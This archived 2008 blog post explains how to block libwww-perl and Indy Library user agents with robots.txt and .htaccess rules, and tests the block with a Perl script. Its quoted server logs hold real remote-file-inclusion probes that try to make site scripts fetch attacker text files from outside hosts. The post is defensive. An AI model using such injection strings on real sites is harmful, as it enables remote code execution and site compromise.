libwww-perl and Indy Library in your server logs?

Here are some sample lines from our server logs ... and I don't like the look of them!

from - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24

from - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17

Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (also known as the "User Agent") - are very likely attempts to find a security hole in our site scripts, through which the attacker can copy code onto our server and go on to infect other systems, or use our site to advertise their own by injecting their URLs. So what are "Indy Library" and "libwww-perl"?

Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...

libwww-perl is the Perl LWP (Library for WorldWideWeb in Perl) library, so in this case it's probable that someone has written an automated program in Perl ...

Automated programs are a necessity - and indeed we welcome well-behaved crawlers, from the well-known Google and Yahoo through to more obscure ones too. But authors of crawlers who properly know what they're doing change the User Agent string rather than using the library default. In my experience, we really don't want the default-agent crawlers on our site: at least 90% are malicious, and the remaining 10% are amateur efforts. So how can we turn them off?

Standard practice is to deny specific user agents via the robots.txt file - but chances are that the naughty bots won't respect that, so we need to enforce the rule!
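For completeness, a robots.txt entry asking these agents to stay away might look like the sketch below. Well-behaved bots will honour it; the nasties we're discussing here will simply ignore it, which is why enforcement follows.

```
# Politely ask these agents to stay away - only honoured by
# bots that actually fetch and respect robots.txt
User-agent: libwww-perl
Disallow: /

User-agent: Indy Library
Disallow: /
```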

Here are three lines that I've added to our .htaccess file ...

SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys

Those lines send a 403 Forbidden response to the automata, telling them that they can't have the page they seek. Goodness knows what the receiving bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.
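To keep that 403 response light, Apache can be pointed at a small static page from the same .htaccess file. A sketch (the filename denied.html is my own invention here, not something from the article's setup):

```
# Serve a tiny static page on 403 rather than the default
# error document - quick, secure, and light on bandwidth
ErrorDocument 403 /denied.html
```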

How do we test that?

Here's a simple Perl script that will declare itself as being libwww:

use strict;
use warnings;
use LWP::UserAgent;

my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
my $res = $ua->request($req);
if ($res->is_success) {
  print $res->content;
} else {
  print "Error: " . $res->status_line . "\n";
}

And when I run that, it now gives me:

-bash-3.2$ perl pg1
Error: 403 Forbidden

If I add the line:

$ua->agent("Well House Consultants Bot");

into that program, I get a much more satisfying result back ...

-bash-3.2$ perl pg2
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on

Links - full source code of our test program without and with our own user agent being set.

One of the matters that I considered very carefully before blocking these user agents was the possibility that I'm blocking some useful and important traffic along with the "nasties" - throwing out the baby with the bathwater, if you like. Not the case, I believe - most people who have legitimate babies take good care of them and name them properly - but I will be watching my log files nonetheless to check.
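Watching the log files for this is easy to script. A sketch of the sort of thing I mean, counting requests per user agent from an Apache "combined" format access log (the log path is an assumption - substitute your own):

```shell
#!/bin/sh
# Count requests per user agent in an Apache "combined" format
# access log, so we can see what the block is (or isn't) catching.
LOG=${1:-/var/log/httpd/access_log}

# In the combined format the user agent is the final quoted field;
# splitting on double quotes with awk makes it field 6.
awk -F'"' '{count[$6]++} END {for (ua in count) print count[ua], ua}' "$LOG" |
  sort -rn | head
```

Run against a day's log, the top few lines quickly show whether libwww-perl and Indy Library are still knocking, and whether anything legitimate shares those agent strings.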

As I finished writing this article - some poetic justice from my log file ...

- - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty-programs-looking-for-security-holes-on-your-server-.html/errors.php?error=http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is looking to hack into a previous short article on security holes and firmly being denied access.

(written 2008-09-13)


This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.


© WELL HOUSE CONSULTANTS LTD., 2017: Well House Manor • 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • FAX: 01144 1225 899360 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho

PAGE: http://www.wellho.net/mouth/1796_lib ... logs-.html • PAGE BUILT: Sat Jun 11 12:16:26 2016 • BUILD SYSTEM: WomanWithCat